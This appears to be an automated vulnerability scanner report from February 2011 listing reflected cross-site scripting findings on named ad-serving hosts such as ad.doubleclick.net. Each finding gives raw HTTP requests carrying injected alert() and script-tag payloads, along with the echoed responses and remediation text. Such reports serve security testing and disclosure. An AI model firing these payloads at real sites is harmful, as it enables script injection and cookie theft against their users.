http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4537085524273794&format=300x250_as&output=html&h=250&w=300&lmt=1296698959&channel=3510583841&ad_type=text_image&alternate_ad_url=http%3A%2F%2Fboardreader.com%2Faffiliate%2Fgagbanner.html%3Fsize%3Dside%26rand%3D6382924&color_bg=FFFFFF&color_border=FFFFFF&color_link=105cb6&color_text=333333&color_url=4F7500&flash=10.1.103&url=http%3A%2F%2Fboardreader.com%2Fdomain%2F2mdn.net%2Fx22%3Febef7%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E6f696982a6d%3D1&dt=1296677358999&shv=r20101117&jsv=r20110120&saldr=1&prev_fmts=468x60_as&correlator=1296677358676&frm=0&adk=3794557511&ga_vid=1197951510.1296677341&ga_sid=1296677341&ga_hid=700497370&ga_fc=1&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1020&bih=969&fu=0&ifi=2&dtd=24&xpc=gTmsrpKGsX&p=http%3A//boardreader.com Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Wed, 02 Feb 2011 20:27:24 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 4981
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page -- ...[SNIP]... 5uZXQveDIyP2ViZWY3JTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0U2ZjY5Njk4MmE2ZD0x4AEC-AEBuAIYwAIByALrprsMqAMB0QMIYrQRpruKOfUDAAAAxA&num=1&sig=AGiWqtyV_xNTt-YUFvVaZyar10BDgj8P2w1d3a0"-alert(1)-"cc96eba19d7&client=ca-pub-4537085524273794&adurl=http%3a%2f%2fdegrees.classesusa.com/schools/%3Fsourceid%3D50545246-232704189-39897819"); var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never"; var ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31220"-alert(1)-"5c310f7490c was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3285.google/B2343920.91;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l31220"-alert(1)-"5c310f7490c&ai=BoYz9ublJTdS3OKHLsQer86zYB5PMjd0Bs7-ixBjbjrqKUYCXIhABGAEgpPSYAzgAULbI36sHYMm-somQpNARoAGZjZzuA7IBD2JvYXJkcmVhZGVyLmNvbboBCjMwMHgyNTBfYXPIAQnaAXZodHRwOi8vd3d3LmJvYXJkcmVhZGVyLmNvbS9kb21haW4vMm1kbi5uZXQveDIyP2ViZWY3JTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0U2ZjY5Njk4MmE2ZD0x4AEC-AEBuAIYwAIByALrprsMqAMB0QMIYrQRpruKOfUDAAAAxA&num=1&sig=AGiWqtyV_xNTt-YUFvVaZyar10BDgj8P2w&client=ca-pub-4537085524273794&adurl=;ord=699026599? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4537085524273794&format=300x250_as&output=html&h=250&w=300&lmt=1296698959&channel=3510583841&ad_type=text_image&alternate_ad_url=http%3A%2F%2Fboardreader.com%2Faffiliate%2Fgagbanner.html%3Fsize%3Dside%26rand%3D6382924&color_bg=FFFFFF&color_border=FFFFFF&color_link=105cb6&color_text=333333&color_url=4F7500&flash=10.1.103&url=http%3A%2F%2Fboardreader.com%2Fdomain%2F2mdn.net%2Fx22%3Febef7%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E6f696982a6d%3D1&dt=1296677358999&shv=r20101117&jsv=r20110120&saldr=1&prev_fmts=468x60_as&correlator=1296677358676&frm=0&adk=3794557511&ga_vid=1197951510.1296677341&ga_sid=1296677341&ga_hid=700497370&ga_fc=1&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1020&bih=969&fu=0&ifi=2&dtd=24&xpc=gTmsrpKGsX&p=http%3A//boardreader.com Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Wed, 02 Feb 2011 20:26:35 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 4981
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page -- ...[SNIP]... = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3aa2/f/1fe/%2a/c%3B232704189%3B1-0%3B0%3B50545246%3B4307-300/250%3B40436189/40453976/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l31220"-alert(1)-"5c310f7490c&ai=BoYz9ublJTdS3OKHLsQer86zYB5PMjd0Bs7-ixBjbjrqKUYCXIhABGAEgpPSYAzgAULbI36sHYMm-somQpNARoAGZjZzuA7IBD2JvYXJkcmVhZGVyLmNvbboBCjMwMHgyNTBfYXPIAQnaAXZodHRwOi8vd3d3LmJvYXJkcmVhZGVyLmNvbS9kb21haW4vMm1kbi5u ...[SNIP]...
1.21. http://ad.doubleclick.net/adi/N3285.msn-dm/B2343920.67 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/adi/N3285.msn-dm/B2343920.67
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3d94"-alert(1)-"3cf86d08147 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3285.msn-dm/B2343920.67;sz=300x250;ord=104579515?click=http://clk.atdmt.com/goiframe/142215812.69688405/197075234/direct/01%3fhref=&e3d94"-alert(1)-"3cf86d08147=1 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://view.atdmt.com/APM/iview/197075234/direct;;wi.300;hi.250/01?click= Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Wed, 02 Feb 2011 21:52:33 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 4153
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page -- ...[SNIP]... .net/click%3Bh%3Dv8/3aa2/f/6b/%2a/u%3B222980277%3B4-0%3B0%3B25708763%3B4307-300/250%3B40308306/40326093/1%3B%3B%7Esscs%3D%3fhttp://clk.atdmt.com/goiframe/142215812.69688405/197075234/direct/01%3fhref=&e3d94"-alert(1)-"3cf86d08147=1https%3a%2f%2finsurance.lowermybills.com/auto/%3Fsourceid%3D25708763-222980277-40326093"); var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never"; var openWindow = "false"; var winW = 3 ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2487d"-alert(1)-"2c5b6b5daa5 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3285.msn-dm/B2343920.67;sz=300x250;ord=104579515?click=http://clk.atdmt.com/goiframe/142215812.69688405/197075234/direct/01%3fhref=2487d"-alert(1)-"2c5b6b5daa5 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://view.atdmt.com/APM/iview/197075234/direct;;wi.300;hi.250/01?click= Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Wed, 02 Feb 2011 21:52:14 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 4163
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page -- ...[SNIP]... k.net/click%3Bh%3Dv8/3aa2/7/68/%2a/p%3B222980277%3B2-0%3B0%3B25708763%3B4307-300/250%3B40114169/40131956/1%3B%3B%7Esscs%3D%3fhttp://clk.atdmt.com/goiframe/142215812.69688405/197075234/direct/01%3fhref=2487d"-alert(1)-"2c5b6b5daa5https://insurance.lowermybills.com/auto/?sourceid=25708763-222980277-40131956"); var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never"; var openWindow = "false"; var winW = 300; var winH ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f361"><script>alert(1)</script>7e001703d00 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/dmd.ehow/computers6f361"><script>alert(1)</script>7e001703d00;cat=computersoftware;scat=;sscat=;art=;qg=;tc=;vid=0;ctype=articles;ugc=0;lvl=1;rsi=;tile=3;sz=300x250;ord=4760230283606905? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.ehow.com/computer-software/?206d4'-alert(1)-'dbefd3749fe=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Wed, 02 Feb 2011 15:31:12 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 593
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- BEGIN STANDARD TAG - 300 x 250 - - DO NOT MODIFY --> <SCRIPT TYPE="text/javascript" SRC="http://ad.yieldmanager.com/st?ad_type=ad&ad_size=300x250&entity=58661&site_code=computers6f361"><script>alert(1)</script>7e001703d00§ion_code=&click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa2/3/0/%2a/h%3B228957569%3B0-0%3B0%3B45373372%3B4307-300/250%3B38375088/38392845/1%3B%3B%7Eaopt%3D2/0/36/0%3B%7Esscs%3D%3f"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1c21"><script>alert(1)</script>57155bc0307 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/dmd.ehow/homepagee1c21"><script>alert(1)</script>57155bc0307;vid=0;ugc=0;lvl=4;sz=300x250;tile=2;ord=2735259747132? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.ehow.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Wed, 02 Feb 2011 15:28:36 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 592
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- BEGIN STANDARD TAG - 300 x 250 - - DO NOT MODIFY --> <SCRIPT TYPE="text/javascript" SRC="http://ad.yieldmanager.com/st?ad_type=ad&ad_size=300x250&entity=58661&site_code=homepagee1c21"><script>alert(1)</script>57155bc0307§ion_code=&click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa2/3/0/%2a/h%3B228957569%3B0-0%3B0%3B45373372%3B4307-300/250%3B38375088/38392845/1%3B%3B%7Eaopt%3D2/0/36/0%3B%7Esscs%3D%3f"> ...[SNIP]...
The value of the Z request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97345'-alert(1)-'e55a08937c8 was submitted in the Z parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /imp?Z=160x60097345'-alert(1)-'e55a08937c8&s=429613&_salt=975924496&B=10&u=http%3A%2F%2Fad.harrenmedianetwork.com%2F&r=0 HTTP/1.1 Host: ad.harrenmedianetwork.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:17:57 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/javascript Date: Wed, 02 Feb 2011 19:17:57 GMT Content-Length: 411 Connection: close
The value of the s request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d6cd7'-alert(1)-'948355e44c0 was submitted in the s parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /imp?Z=160x600&s=429613d6cd7'-alert(1)-'948355e44c0&_salt=975924496&B=10&u=http%3A%2F%2Fad.harrenmedianetwork.com%2F&r=0 HTTP/1.1 Host: ad.harrenmedianetwork.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:17:57 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/javascript Date: Wed, 02 Feb 2011 19:17:57 GMT Content-Length: 411 Connection: close
The value of the ad_size request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8e920'-alert(1)-'fcb38195981 was submitted in the ad_size parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /st?ad_type=iframe&ad_size=160x6008e920'-alert(1)-'fcb38195981§ion=429613 HTTP/1.1 Host: ad.harrenmedianetwork.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:17:55 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/html; charset=utf-8 Date: Wed, 02 Feb 2011 19:17:55 GMT Content-Length: 641 Connection: close
The value of the ad_size request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9b92"><script>alert(1)</script>9e1c2d8085e was submitted in the ad_size parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /st?ad_type=iframe&ad_size=160x600f9b92"><script>alert(1)</script>9e1c2d8085e§ion=429613 HTTP/1.1 Host: ad.harrenmedianetwork.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:17:55 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/html; charset=utf-8 Date: Wed, 02 Feb 2011 19:17:55 GMT Content-Length: 711 Connection: close
The value of the section request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f47e8'-alert(1)-'64ed47f711b was submitted in the section parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /st?ad_type=iframe&ad_size=160x600§ion=429613f47e8'-alert(1)-'64ed47f711b HTTP/1.1 Host: ad.harrenmedianetwork.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:17:55 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/html; charset=utf-8 Date: Wed, 02 Feb 2011 19:17:55 GMT Content-Length: 641 Connection: close
The value of the section request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f92b8"><script>alert(1)</script>05d28b2545d was submitted in the section parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /st?ad_type=iframe&ad_size=160x600§ion=429613f92b8"><script>alert(1)</script>05d28b2545d HTTP/1.1 Host: ad.harrenmedianetwork.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:17:55 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/html; charset=utf-8 Date: Wed, 02 Feb 2011 19:17:55 GMT Content-Length: 711 Connection: close
1.31. http://ad.reduxmedia.com/st [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.reduxmedia.com
Path:
/st
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6cc2b"-alert(1)-"605cd6b88a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /st?ad_type=iframe&ad_size=120x600§ion=681714&6cc2b"-alert(1)-"605cd6b88a5=1 HTTP/1.1 Host: ad.reduxmedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 19:18:16 GMT Server: YTS/1.18.4 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Cache-Control: no-store Last-Modified: Wed, 02 Feb 2011 19:18:16 GMT Pragma: no-cache Content-Length: 4638 Age: 0 Connection: close
<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ad.reduxmedia.com/imp?6cc2b"-alert(1)-"605cd6b88a5=1&Z=120x600&s=681714&_salt=272437912";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Arr ...[SNIP]...
The value of the Z request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9973'-alert(1)-'b683290dc0 was submitted in the Z parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /imp?Z=300x250b9973'-alert(1)-'b683290dc0&s=601669&_salt=1358407199&B=10&u=http%3A%2F%2Fad.scanmedios.com%2F&r=0 HTTP/1.1 Host: ad.scanmedios.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:18:01 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/javascript Date: Wed, 02 Feb 2011 19:18:01 GMT Content-Length: 402 Connection: close
The value of the s request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload abe80'-alert(1)-'f0f512ee374 was submitted in the s parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /imp?Z=300x250&s=601669abe80'-alert(1)-'f0f512ee374&_salt=1358407199&B=10&u=http%3A%2F%2Fad.scanmedios.com%2F&r=0 HTTP/1.1 Host: ad.scanmedios.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:18:01 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/javascript Date: Wed, 02 Feb 2011 19:18:01 GMT Content-Length: 404 Connection: close
The value of the ad_size request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dce2d'-alert(1)-'7ba8e3efc79 was submitted in the ad_size parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /st?ad_type=iframe&ad_size=300x250dce2d'-alert(1)-'7ba8e3efc79§ion=601669 HTTP/1.1 Host: ad.scanmedios.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:18:01 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/html; charset=utf-8 Date: Wed, 02 Feb 2011 19:18:01 GMT Content-Length: 641 Connection: close
The value of the ad_size request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a927c"><script>alert(1)</script>8783e6815d8 was submitted in the ad_size parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /st?ad_type=iframe&ad_size=300x250a927c"><script>alert(1)</script>8783e6815d8§ion=601669 HTTP/1.1 Host: ad.scanmedios.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:18:01 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/html; charset=utf-8 Date: Wed, 02 Feb 2011 19:18:01 GMT Content-Length: 711 Connection: close
The value of the section request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9583"><script>alert(1)</script>2bc6827f86d was submitted in the section parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /st?ad_type=iframe&ad_size=300x250§ion=601669a9583"><script>alert(1)</script>2bc6827f86d HTTP/1.1 Host: ad.scanmedios.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
